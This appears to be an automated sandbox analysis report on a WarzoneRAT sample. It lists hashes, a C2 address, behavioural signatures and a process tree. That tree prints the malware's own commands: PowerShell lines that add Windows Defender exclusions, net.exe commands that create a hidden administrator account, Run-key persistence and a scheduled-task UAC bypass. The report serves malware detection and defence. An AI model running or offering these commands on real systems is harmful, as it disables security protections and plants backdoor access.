Analysis

- max time kernel: 143s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 02-07-2022 15:40

Static task: static1

Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Resource: win7-20220414-en

Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Resource: win10v2004-20220414-en
General

- Target: SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Size: 1.8MB
- MD5: 212b1e774e310dbe4e92b01854f31d53
- SHA1: 635349bf28642a2a4b32155fe2864f6dfd51a483
- SHA256: d22de2ac8939c185e56867b691702abd0304adf75c2b62dbff801228bdcf0dbe
- SHA512: 3c7be7251079c9610ddd5923307d4887746d6f43c8dcf81d82e2696726000cf8912be1530f1a388cd4520289bf0722dc270defbe23a631771a83befc2d9f689e
Malware Config

Extracted
- Family: warzonerat
- C2: workstation2022.ddns.net:5254
Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

Windows security bypass
Processes (description | ioc | process):
- Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe = "0" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\Boehorse\svchost.exe = "0" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Warzone RAT Payload 4 IoCs
Processes (resource | yara_rule):
- behavioral2/memory/1128-155-0x0000000000400000-0x0000000000555000-memory.dmp | warzonerat
- behavioral2/memory/1128-157-0x0000000000400000-0x0000000000555000-memory.dmp | warzonerat
- behavioral2/memory/1128-163-0x0000000000400000-0x0000000000555000-memory.dmp | warzonerat
- behavioral2/memory/1128-176-0x0000000000400000-0x0000000000555000-memory.dmp | warzonerat

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Windows security modification
Processes (description | ioc | process):
- Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe = "0" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\Boehorse\svchost.exe = "0" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Adds Run key to start application 2 TTPs 3 IoCs
Processes (description | ioc | process):
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SecuriteInfo.com.Variant.Tedy.123517.9877.exe\"" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ejxheadline = "C:\\Users\\Public\\Documents\\Boehorse\\svchost.exe" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Ejxheadline = "C:\\Users\\Public\\Documents\\Boehorse\\svchost.exe" | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Suspicious use of SetThreadContext 1 IoCs
Processes (description | pid | process | target process):
- PID 3124 set thread context of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (pid | process):
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 4624 | powershell.exe
- 4624 | powershell.exe
- 1452 | powershell.exe
- 3684 | powershell.exe
- 2848 | powershell.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 1452 | powershell.exe
- 3684 | powershell.exe
- 2848 | powershell.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes (description | pid | process):
- Token: SeDebugPrivilege | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe
- Token: SeDebugPrivilege | 4624 | powershell.exe
- Token: SeDebugPrivilege | 1452 | powershell.exe
- Token: SeDebugPrivilege | 3684 | powershell.exe
- Token: SeDebugPrivilege | 2848 | powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs
Processes (description | pid | process | target process):
- PID 3124 wrote to memory of 4624 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 4624 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 4624 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 2432 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 2432 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 2432 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 2432 wrote to memory of 4972 | 2432 | net.exe | net1.exe
- PID 2432 wrote to memory of 4972 | 2432 | net.exe | net1.exe
- PID 2432 wrote to memory of 4972 | 2432 | net.exe | net1.exe
- PID 3124 wrote to memory of 3272 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 3272 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 3272 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3272 wrote to memory of 1592 | 3272 | net.exe | net1.exe
- PID 3272 wrote to memory of 1592 | 3272 | net.exe | net1.exe
- PID 3272 wrote to memory of 1592 | 3272 | net.exe | net1.exe
- PID 3124 wrote to memory of 4976 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 4976 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 4976 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 4976 wrote to memory of 4940 | 4976 | net.exe | net1.exe
- PID 4976 wrote to memory of 4940 | 4976 | net.exe | net1.exe
- PID 4976 wrote to memory of 4940 | 4976 | net.exe | net1.exe
- PID 3124 wrote to memory of 3320 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 3320 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3124 wrote to memory of 3320 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | net.exe
- PID 3320 wrote to memory of 4692 | 3320 | net.exe | net1.exe
- PID 3320 wrote to memory of 4692 | 3320 | net.exe | net1.exe
- PID 3320 wrote to memory of 4692 | 3320 | net.exe | net1.exe
- PID 3124 wrote to memory of 308 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | schtasks.exe
- PID 3124 wrote to memory of 308 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | schtasks.exe
- PID 3124 wrote to memory of 308 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | schtasks.exe
- PID 3124 wrote to memory of 1452 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 1452 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 1452 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 3684 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 3684 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 3684 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 2848 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 2848 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 2848 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | powershell.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
- PID 3124 wrote to memory of 1128 | 3124 | SecuriteInfo.com.Variant.Tedy.123517.9877.exe | regedt32.exe
Processes

Process tree (image path, then command line, indented by depth; the signatures each process triggered are listed beneath it):

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe
  "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe"
  - Windows security bypass
  - Checks BIOS information in registry
  - Checks computer location settings
  - Windows security modification
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup users "Admin" /add
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup users "Admin" /add

  C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators "Admin" /del
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators "Admin" /del

  C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\Boehorse\svchost.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\Boehorse\svchost.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\regedt32.exe
    "C:\Windows\SysWOW64\regedt32.exe"
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 968cb9309758126772781b83adb8a28f
  SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
  SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
  SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 5cd9282083a95352b2ae8bbcf5c0bfec
  SHA1: 898d8e87993a8a18bef68343a8894e730d6e06c7
  SHA256: a124d40522e39a5cc156bfec06036558561c15d764abdeb57dcae94ef83b0332
  SHA512: dce15e171c9d5194b8e89b155b20519bd3ee6ee5038345eecb284b867e5de3f80a27808d09af1919383d5d07538056f5b3d5b189dc99049b5095a710e1634f63

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 6577418d00fa4f23e47266413ae9a751
  SHA1: 5473635edce6870e2c1cb51c3b9f845545008ce7
  SHA256: efa81d820e6ba5a1eceabcf1292652ac114119e11981d933cab1c37e754f890d
  SHA512: 5e64f99497cdd64d80d829d94d9ec7478acc899616f0715c010cf13a94594e7027bd2eb23e4977a40d027a4e4152da0b622f26dbe4e2f38b19fc17d359352f93

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 5KB
  MD5: 63bdde4fb53099c413400d589cc220e6
  SHA1: c88bdb29dfd3a1bb7ff3f0f7ddb89b88fb2a2a4a
  SHA256: 0ed6cce2ef27bb349b02b90fa50924d20157b8071a53cda75830b1ec3c302205
  SHA512: c42b13e87ef043e3d1932dd5cce23b8d2062ee336c22ab389b7ea2a5b0c251c18118dac6b848b9770c4c64280eada87369975a9e5f9bd78184c9ba2c0d3bd11e